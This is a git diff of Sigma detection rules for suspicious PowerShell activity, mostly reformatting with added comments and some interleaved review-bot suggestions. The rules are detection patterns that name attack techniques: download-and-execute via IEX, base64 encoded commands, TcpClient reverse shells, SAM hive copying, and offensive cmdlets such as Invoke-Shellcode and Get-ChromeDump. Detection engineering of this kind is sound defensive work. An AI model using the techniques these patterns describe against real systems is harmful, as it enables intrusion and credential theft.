diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml index 05e3ca71a..a6f250b04 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml @@ -22,7 +22,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' | iex;' - ' | iex ' - ' | iex}' @@ -31,11 +31,11 @@ detection: - ' | IEX (new' - ');IEX ' selection_combined_2: - CommandLine|contains: + CommandLine|contains: - ::FromBase64String - '.GetString([System.Convert]::' selection_standalone: - CommandLine|contains: + CommandLine|contains: - )|iex;$ - );iex($ - );iex $ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml index 782916a03..d15ba22c9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml @@ -1,8 +1,7 @@ title: Root Certificate Installed From Susp Locations id: 5f6a601c-2ecb-498b-9c33-660362323afa status: test -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps 
@@ -21,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Certificate - ' -FilePath ' - Cert:\LocalMachine\Root - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - :\Windows\TEMP\ - \Desktop\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml index 76dd0b9b8..2ef00614e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml @@ -1,8 +1,8 @@ title: Import PowerShell Modules From Suspicious Directories - ProcCreation id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 related: - - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab - type: similar + - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab + type: similar status: test description: Detects powershell scripts that import modules from suspicious directories references: @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Import-Module "$Env:Temp\ - Import-Module '$Env:Temp\ - Import-Module $Env:Temp\ @@ -29,6 +29,7 @@ detection: - Import-Module '$Env:Appdata\ - Import-Module $Env:Appdata\ - Import-Module C:\Users\Public\ + # Import-Module alias is "ipmo" - ipmo "$Env:Temp\ - ipmo '$Env:Temp\ - ipmo $Env:Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml index 47ae2142c..e715e972a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml 
@@ -1,11 +1,10 @@ title: Unsigned AppX Installation Attempt Using Add-AppxPackage id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a related: - - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 - type: similar + - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 + type: similar status: test -description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" - to install unsigned AppX packages +description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages references: - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package - https://twitter.com/WindowsDocs/status/1620078135080325122 @@ -23,18 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Add-AppPackage ' - 'Add-AppxPackage ' selection_flag: - CommandLine|contains: ' -AllowUnsigned' + CommandLine|contains: ' -AllowUnsigned' condition: process_creation and (all of selection_*) falsepositives: - Installation of unsigned packages for testing purposes diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml index af0a8d7a7..8cc2bf5ad 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml 
@@ -1,12 +1,12 @@ title: Suspicious PowerShell Invocations - Specific - ProcessCreation id: 536e2947-3729-478c-9903-745aaffe60d2 related: - - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c - type: derived - - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 - type: similar - - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 - type: similar + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived + - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 + type: similar + - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Nasreddine Bencherchali (Nextron Systems) @@ -22,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_convert_b64: - CommandLine|contains|all: + CommandLine|contains|all: - -nop - ' -w ' - hidden - ' -c ' - '[Convert]::FromBase64String' selection_iex: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -noni @@ -38,20 +38,20 @@ detection: - iex - New-Object selection_enc: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -ep - bypass - -Enc selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - reg - add - \software\ selection_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - bypass - -noprofile - -windowstyle @@ -60,13 +60,13 @@ detection: - system.net.webclient - .download selection_iex_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - iex - New-Object - Net.WebClient - .Download filter_chocolatey: - CommandLine|contains: + CommandLine|contains: - (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1 - Write-ChocolateyWarning condition: process_creation and (1 of selection_* and not 1 of filter_*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml index 5860c4ff5..8ce17c605 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml @@ -1,8 +1,7 @@ title: Suspicious Invoke-WebRequest Execution With DirectIP id: 1edff897-9146-48d2-9066-52e8d8f80a2f status: experimental -description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct - IP access +description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software author: Nasreddine Bencherchali (Nextron Systems) @@ -19,20 +18,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_ip: - CommandLine|contains: + # In case of FP with local IPs add additional filters + CommandLine|contains: - ://1 - ://2 - ://3 diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml index 53c0453f2..c37b4f959 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml 
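Review bot: The added comment `# These are all aliases of Invoke-WebRequest` is only accurate for Windows PowerShell 5.1; PowerShell 6+ (pwsh.exe, which selection_img also matches) removed the `curl` and `wget` aliases, so a `curl ` hit under pwsh.exe is more likely a native curl.exe invocation and a false-positive source worth documenting. Suggest `# iwr/curl/wget are Invoke-WebRequest aliases in Windows PowerShell 5.1; pwsh removed curl and wget`. The same comment is added in the next file's second hunk (proc_creation_win_powershell_invoke_webrequest_download.yml) and should be adjusted there too.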
@@ -1,11 +1,10 @@ title: Suspicious Invoke-WebRequest Execution id: 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc related: - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 + type: derived status: experimental -description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output - is located in a suspicious location +description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,24 +22,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ur' - ' -o' selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\ - \Desktop\ - \Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml index 1adebd8cd..920a6dbe4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml 
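Review bot: The rewrapped description keeps the pre-existing typo `where the and output is located`; since the line is rewritten by this hunk anyway, `description: Detects a suspicious call to Invoke-WebRequest cmdlet where the output is located in a suspicious location` would fix it at no extra cost.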
@@ -1,8 +1,7 @@ title: Suspicious PowerShell Mailbox Export to Share id: 889719ef-dd62-43df-86c3-768fb08dc7c0 status: test -description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports - a mailbox to a remote or local share, as used in ProxyShell exploitations +description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations references: - https://youtu.be/5mqid-7zp8k?t=2481 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - New-MailboxExportRequest - ' -Mailbox ' - ' -FilePath \\\\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml index c45d25821..6b267fe06 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml @@ -1,10 +1,10 @@ title: Malicious PowerShell Commandlets - ProcessCreation id: 02030f2f-6199-49ec-b258-ea71b07e03dc related: - - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - type: derived - - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c - type: similar + - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + type: derived + - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c + type: similar status: experimental description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: 
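Review bot: The joined description still reads `Cmdlet to exports a mailbox`; while the line is being rewritten, `description: Detects usage of the PowerShell New-MailboxExportRequest Cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations` fixes the grammar and the casing of "PowerShell".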
@@ -14,9 +14,9 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP @@ -49,7 +49,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Note: Please ensure alphabetical order when adding new entries + CommandLine|contains: - Add-Exfiltration - Add-Persistence - Add-RegBackdoor @@ -74,7 +75,7 @@ detection: - Find-Fruit - Find-GPOLocation - Find-TrustedDocuments - - Get-ADIDNS + - Get-ADIDNS # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone - Get-ApplicationHost - Get-ChromeDump - Get-ClipboardContents @@ -143,7 +144,7 @@ detection: - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem 
@@ -167,7 +168,7 @@ detection: - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP @@ -186,7 +187,7 @@ detection: - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler @@ -232,7 +233,7 @@ detection: - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Set-MacAttribute - Set-MachineAccountAttribute - Set-Wallpaper diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml index 021298c5d..ec9ca368d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml @@ -1,8 +1,8 @@ title: MSExchange Transport Agent Installation id: 83809e84-4475-4b69-bc3e-4aad8568612f related: - - id: 83809e84-4475-4b69-bc3e-4aad8568612f - type: similar + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: similar status: test description: Detects the Installation of a Exchange Transport Agent references: @@ -22,12 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: Install-TransportAgent + CommandLine|contains: Install-TransportAgent condition: process_creation and selection fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml index f650ffc97..2f159e718 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml @@ -1,8 +1,7 @@ title: Non Interactive PowerShell Process Spawned id: f4bbd493-b796-416e-bbf2-121235348529 status: test -description: Detects non-interactive PowerShell activity by looking at the "powershell" - process with a non-user GUI process such as "explorer.exe" as a parent. +description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. references: - https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) 
@@ -20,30 +19,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll filter_main_generic: ParentImage|endswith: - :\Windows\explorer.exe - :\Windows\System32\CompatTelRunner.exe - :\Windows\SysWOW64\explorer.exe filter_main_windows_update: - ParentImage: :\$WINDOWS.~BT\Sources\SetupHost.exe + ParentImage: :\$WINDOWS.~BT\Sources\SetupHost.exe # During Windows updates/upgrades + # CommandLine: powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1'; filter_optional_vscode: + # Triggered by VsCode when you open a Shell inside the workspace ParentImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe ParentCommandLine|contains: ' --ms-enable-electron-run-as-node ' filter_optional_terminal: ParentImage|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal_ ParentImage|endswith: \WindowsTerminal.exe - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB - scripts which may trigger this rule often. It is best to add additional filters - or use this to hunt for anomalies + - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml index 07158966f..223b75a54 100644 
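Review bot: The new line `# CommandLine: powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';` under filter_main_windows_update reads like a disabled condition rather than documentation, and since that filter keys only on ParentImage, every PowerShell child of SetupHost.exe is excluded regardless of its command line. If the intent is to record the observed benign invocation, `# Observed during Windows upgrades: powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';` makes that explicit; if the intent is to narrow the exclusion, it should become a real `CommandLine|contains` key so that other PowerShell spawned from SetupHost.exe is not silently dropped. The same placement question applies to the VS Code comment added inside filter_optional_vscode, which is fine as documentation but sits between the key and its first field.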
--- a/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: (WCHAR)0x + CommandLine|contains: (WCHAR)0x condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml index 342d21fc5..fa9e65efd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml @@ -1,8 +1,7 @@ title: Execution of Powershell Script in Public Folder id: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4 status: test -description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" - folder +description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder references: - https://www.mandiant.com/resources/evolution-of-fin7 author: Max Altgelt (Nextron Systems) @@ -23,7 +22,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - -f C:\Users\Public - -f "C:\Users\Public - -f %Public% diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml index bd32ed72a..462d00240 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml 
@@ -1,16 +1,14 @@ title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 related: - - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 - type: similar - - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 - type: similar - - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 - type: similar + - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic + type: similar + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module + type: similar + - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock + type: similar status: test -description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" - which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom - PowerShell code via module load-order hijacking. +description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 @@ -29,7 +27,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Invoke-ATHRemoteFXvGPUDisablementCommand - Invoke-ATHRemoteFXvGPUDisableme condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml index 017c1edcc..18ae4e5d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml @@ -1,9 +1,7 @@ title: Potential Powershell ReverseShell Connection id: edc2f8ae-2412-4dfd-b9d5-0c57727e70be status: stable -description: Detects usage of the "TcpClient" class. Which can be abused to establish - remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" - reverse shell and other. +description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -23,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' Net.Sockets.TCPClient' - .GetStream( - .Write( diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml index 93ba44050..00c212193 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml @@ -25,7 +25,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains|all: + CommandLine|contains|all: - Get-Content - -Stream condition: process_creation and selection 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml index d115dc8e8..f65d154a2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml @@ -24,7 +24,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|re: \s-\s*< + CommandLine|re: \s-\s*< condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml index d610ee632..61fbc6dce 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml @@ -19,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - \HarddiskVolumeShadowCopy - System32\config\sam selection_2: - CommandLine|contains: + CommandLine|contains: - Copy-Item - cp $_. - cpi $_. diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml index 3898e0885..242b48980 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml 
@@ -1,8 +1,7 @@ title: Suspicious PowerShell Invocation From Script Engines id: 95eadcb2-92e4-4ed1-9031-92547773a6db status: test -description: Detects suspicious powershell invocations from interpreters or unusual - programs +description: Detects suspicious powershell invocations from interpreters or unusual programs references: - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml index 52c432a12..c12261e48 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml @@ -1,12 +1,10 @@ title: Suspicious Service DACL Modification Via Set-Service Cmdlet id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: derived + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 + type: derived status: test -description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using - the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can - be used to hide services or make them unstopable +description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings 
@@ -24,17 +22,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \pwsh.exe - - OriginalFileName: pwsh.dll + - Image|endswith: \pwsh.exe + - OriginalFileName: pwsh.dll selection_sddl_flag: - CommandLine|contains: + CommandLine|contains: - '-SecurityDescriptorSddl ' - '-sd ' selection_set_service: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Service ' - D;; - CommandLine|contains: + CommandLine|contains: - ;;;IU - ;;;SU - ;;;BA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml index 2aefae540..f1de1354a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml @@ -1,12 +1,12 @@ title: PowerShell Script Change Permission Via Set-Acl id: bdeb2cff-af74-4094-8426-724dc937f20a related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: 